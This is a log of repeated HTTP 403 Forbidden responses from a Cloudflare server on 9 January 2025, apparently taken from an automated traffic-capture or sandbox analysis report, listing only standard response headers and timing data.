Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:22 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FVC%2BoSGHonZ4Ft8Nknvf5F%2BWAmUpB9%2BjrA%2BuHh4rKpssfg5kvfqh1p7KclrzdpCU0d2eRp1%2Ft3VQUX3KVtqeGm56cmO51N5ceGuH0rxQs7lZLjVrV8BqgBKqVuDUjQdZWRU7TR9cxE%2BJA9Ly"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4162b4332d3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2020&min_rtt=2018&rtt_var=762&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1431372&cwnd=146&unsent_bytes=0&cid=9d565a075f6e4adc&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:23 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G34aPcYlCkyLGZZmcxtuqVi%2BUbyb5dycEzvANPb4XwTAsUhr%2F63Fou9NzQ0Wxp4NdKDpzrt%2FsUa682Z9aOweOLksUzHgjFxRFoG07MVvOQOo%2B45as8wFLjr8go3%2BrhE%2BV%2FDbA%2BGSF5ZeD9F4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c419f8978cba-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2008&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1432777&cwnd=218&unsent_bytes=0&cid=7710c19111aa3c85&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:08 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:23 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O2Jltss1b6nIThqXoMLovJ9ocLXZBmd5uDSVqDdjSCJBRWc7e%2BDQ6ryJlOHTyosxlqokssIQfZmXoXnsIF8Bil%2B%2BCM8Zpdw%2BzgJ%2FHKcsSj6EhB8XPO2vh6i7NC5YAapgKhIF0zAJh0L3INgX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c41da8b6c436-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1697&min_rtt=1695&rtt_var=641&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1701631&cwnd=223&unsent_bytes=0&cid=3739bc81dae6c710&ts=126&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:09 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:24 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IO4JF5eMJB4cYrdXOdVQI0%2BZBLN95OhpzTeMpIuJm36i5uVvpS4qjQo69iIJECCyizwr4zsautVgFp8wmM4A5CSpqBKDgstFNH58reLuJdtMD7Cly7yitMeOoqPTrv9UGqoO8GspXW8x3y0L"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4217b294375-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2018&min_rtt=2010&rtt_var=769&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1407907&cwnd=32&unsent_bytes=0&cid=fea29f18cbf2e2a4&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:25 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AjdiOoBys%2FojScclqk1fMXi2nPG6AI8IBEkBRD7M8x63pmS%2Fe0%2BC3LmQuiZCJ7zdpCLYbhd8%2BnJxkr8RLrnLkIbYi11diGqdXdnXSmr9t%2ByOd3sOPliQTYHf9p%2BEC94mh6ch1Wxu8of%2FcaU4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c42538515e5f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1625&rtt_var=625&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1796923&cwnd=251&unsent_bytes=0&cid=1b6c9c4c9f189bd7&ts=150&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:25 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2m8dPM1xODd%2BW%2FrGQyt1ZSCpQEE8tnk4nSEo9%2FEV6kvwoeNHjdxJFdarCYZFLZa1twL8sMisxhrouDN%2BT9kETZ2f0vtRsfCnV%2FJUUM3V035aO70Jj5e6jIynJV%2FnTkyYkGaV6w%2Bt6lleCQP%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c428ee50c43b-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1720&min_rtt=1712&rtt_var=658&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1644144&cwnd=194&unsent_bytes=0&cid=9ce905157cf94bc7&ts=131&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:26 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hYpq6e0U64z9XHgVvzESKVeKUzC%2FrxAMNLYZEOIFRZiUaimvnPJgAF9rTUNYjMyY1tWosSU9WTpRUTROLW%2BoGI0FmftnfJOhsxR%2BypjNynXKLOnYh80tD6GV51IvBCW%2FiEeLC7v215is0pmR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c42cbc8b0f78-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1711&rtt_var=646&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1689814&cwnd=220&unsent_bytes=0&cid=afce33f288ac8cee&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:11 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:26 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HhAXYAgPEcepzrnSg39VxM8ED%2BwTzoRB1T%2ByiDLcwFCc1gL3c%2BLPJNSFGtuiNJa%2FlGKjRSQrqgvgfm0yYujgh%2FbROvVqXvqfuix7p%2BLYh14B9yenVnPv314xIY%2Bc09jp0u%2FqlSzFY0nCIMfD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4305cf24252-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2474&min_rtt=2469&rtt_var=936&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1163346&cwnd=235&unsent_bytes=0&cid=bef21af4db1381c4&ts=132&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:12 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:27 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c1q%2F4Gw4eqWAtYylpbsjOb5NFosBo4T00GbcLj3n4aF7l51pbbRrzXF%2Fsji9%2FcDGI2mSgysAb2NTu4I3c4niFoLfscXrgAIljRtQH3aTHJDLfFfcOZkLk0Cb7rXxGkoiFQa34ZgvEuRoeFni"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4340be34245-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1879&min_rtt=1814&rtt_var=811&sent=3&recv=5&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1248930&cwnd=193&unsent_bytes=0&cid=0c4c64867f23bfa3&ts=127&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:28 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UE%2Bd0LZwI5WH5%2Bgkb6tjEKr1j33DyHEBkUMVvXUo90Jhv9ksg9aC72C3pdqhFGwNC2M4nSg%2Bid3b9hXV2jn1Qm%2FRHLJOC7dSAkciiU0El9C1EyYzh31M%2FTN8UxUHKak7q6L1HwNHA8opLEh3"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c437bed8f78f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1633&rtt_var=620&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1753753&cwnd=137&unsent_bytes=0&cid=0ebccf0c91bbfa62&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:28 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkE5mNBkaOkpLqw3kTavar%2F7r2kREVXJ0LGUFBwWvKPbRbuWm%2FBtabyZspi9fcR6maR4ibfqwt0oAX2K5JzJUkrPRzNY41PMCoUWE2GqyQ9BbRUu3NM%2FAAlGo2b51WE8ybJV2GMPApjVpCQy"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c43bbfcaf799-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1658&min_rtt=1654&rtt_var=628&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1731909&cwnd=140&unsent_bytes=0&cid=6beb3b5d9710bd5d&ts=144&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:29 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2BW1gDd90H0OzlJHomyoyAQ1jXX%2BA6bYQO8H3VlwRs2mfXv%2BALtuY%2BC6sD4zJkwLocNwnbVEbUycJVKefkoEnNUszwUinftSHgEenLSubuHYLAzfxQOI821DGTx9qdES68%2BXxA%2BZd0Z%2FTVP6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c43f891643e7-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1578&min_rtt=1573&rtt_var=601&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1805813&cwnd=228&unsent_bytes=0&cid=427adcf6592c7f4b&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:14 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:29 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VlRII9JNLZAepqmFsN50v0jT%2FhCbWt4aDltwZYWqwIZIv1FREidT7ZaFhiqQ7c5IhCDtjcEd3Xx%2Frmek0iCK6bXV3SbMm8%2FrRUy12Ma%2FmMYSLCWJzcC0mcRAjQB94TiSIAzPxKFJO6ypxvlq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4435e9c8c33-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1968&min_rtt=1964&rtt_var=745&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1461461&cwnd=245&unsent_bytes=0&cid=634ef78f87c3dde7&ts=141&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:30 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EB9pt4WPb5Wy%2Ba0oDy0TzRcoiCyZwp345sqBLdXkcNbSYfJPBhCp9MDM6gr1IttXm7rQjqDZjDihirevsEB19kHi%2BqNuARy3bKznxzzCzmGSbLB5HiWInieNCZJOrXIW8fbmnaJ6h9kmhXNL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4472e6b43c9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1615&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1765417&cwnd=230&unsent_bytes=0&cid=034f676bcefb707c&ts=138&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:16 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:31 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xE25PkVxytz3EetFE6zOs6q6lao3iWw4PIkqPPly1FSTYdzBLe0BWD2nENMwGqcLXZ3M1akBjhnt75%2Bmr2RiAc2M0tRc2NSens7u213Nvcp68zkwk%2Bo0kI32%2Bfm4ex%2BAj7CCl7yMn%2FKqqBLq"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c44f5927c481-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1678&min_rtt=1674&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1704611&cwnd=236&unsent_bytes=0&cid=bdca6b7029005d9a&ts=838&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:32 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2fUkvIh0O%2B%2Fbyong24vTk7wonF7sHPsSMDA15kTd8upAH4Wbx969sE%2BKEScCpRijoE2I69Xtt83AHwPCVATABOS5Qtg8DaiBjO6m5qJdohSPrGs2sQwCs6Z093pkQAa4gZSaDS2rS4lZ8%2FvV"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c45439877c88-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2008&rtt_var=761&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1429270&cwnd=219&unsent_bytes=0&cid=5fcbcbcdfcb6c5a0&ts=145&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:33 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dOkbKj4%2BeCGVa2kp4RtVC4ZqT1NbepKvbLlD1gaIg0SieyD%2BHssySa%2FU4s9IcMO%2FVm3vgu%2FBlZaO4JPmv1IXnAjo7dYH1v%2FcXqgwGb7slPwyVPZXVyp1T7RAKZwmqF6jdgralMN0OqCUmT32"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4582c39f793-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1618&min_rtt=1614&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2853&recv_bytes=704&delivery_rate=1769696&cwnd=152&unsent_bytes=0&cid=d92f1df9a962ec05&ts=148&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:33 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JxhK50t%2BZOW9inY0pr%2FmnGT%2FIfQNUHYL8D2F6E%2BwUB1SQjUq%2FXvwUKCblGCLswASh89DPOVPBSXM0S3Aw%2FuH6YDQqDAD3yW9%2FHv3CGigiWBNQrQqCNkbcMJaNb4kukIkjnCOTFI0HNpiL0ko"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c45bc8737d05-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1893&min_rtt=1888&rtt_var=719&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1509043&cwnd=195&unsent_bytes=0&cid=83b8a3882d7fc04a&ts=128&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:34 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CwPhr7HiCMWIDIKueJnIPvFwL3v%2BQ3nW0pd%2Fb6IL%2FydGbP0cCSNNfecmQB4KuFk0WKxQuqM3l1KBeVT41781tzw1hWz7Lj%2Ferml%2FK75EedjCLIPdAxT7B91bsPDiIGQqAiMqGyCHb2q0ssoD"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c45f98ed41b5-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1726&min_rtt=1718&rtt_var=650&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1699650&cwnd=207&unsent_bytes=0&cid=877ab8e7e3e1ee79&ts=139&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:35 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yODSveyqL4YYufdm%2FPwKmCKmPNtCjvB1Dt1K33Vrg9TKPI6JL7h2C1gPgPELcVJjqPq6QiaDlztiz3lVQeLuUbKF9xJ0PgJSYGJSfI9bDU6IYE2kK3cjRzP4bbZQvMCo8QGJ6qXoF5QVSDyh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c4633a4ac336-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1462&min_rtt=1452&rtt_var=565&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1901041&cwnd=245&unsent_bytes=0&cid=fb2d17098f6179e0&ts=124&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:20 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:35 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nlud952iOTpKtMEmN0tyvXT%2Bij98tHKLquAKDrwMQM3UGFGl24Bji31%2B22Ie%2BGe8xgHUyW2TW03VII%2BDH%2BFKjzBx1sr5GYXmJ4Okx%2F%2B1ezM2Zp0DgfI1sGV3RGqQBuV7W2u0v9xCr0%2F1s9Fi"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c466ef5af78f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1618&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1768625&cwnd=137&unsent_bytes=0&cid=8ee0ba111ac7e1b3&ts=141&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:36 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XD12dIeYSpKIWv3BNSG5T9tzmCtVZOlseHYLj3rpe2vkzpsOUM0Gr98TbYMFZuBxwxhRDT0osDbnFjB0MCRWpGBTYKP10oJAFyYmElRUI6j%2BF80QLI2bhamMxM%2FuowV9LDpI%2BnQW3%2FcFKbLC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c46b0d6a8ca2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1975&min_rtt=1948&rtt_var=750&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1498973&cwnd=252&unsent_bytes=0&cid=80d5b856b7bbc991&ts=149&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Thu, 09 Jan 2025 07:38:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=15Expires: Thu, 09 Jan 2025 07:38:36 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5fS5Vm70ryLgaBzBDR9acfkj3MgpG95ww2MPaLToyJJgyCErxrDmtjLuj5o0eo0MEzaJNpXp1XtRa4wAERI%2FPOuERPVdnfPY6%2BoQyrsxx5OWOZRm5aqRzWkGgZoLIqnzSJkv7p2hFdLQcRiY"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 8ff2c46eeac70cb8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1518&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1923583&cwnd=179&unsent_bytes=0&cid=3a840565090fdef6&ts=147&x=0"
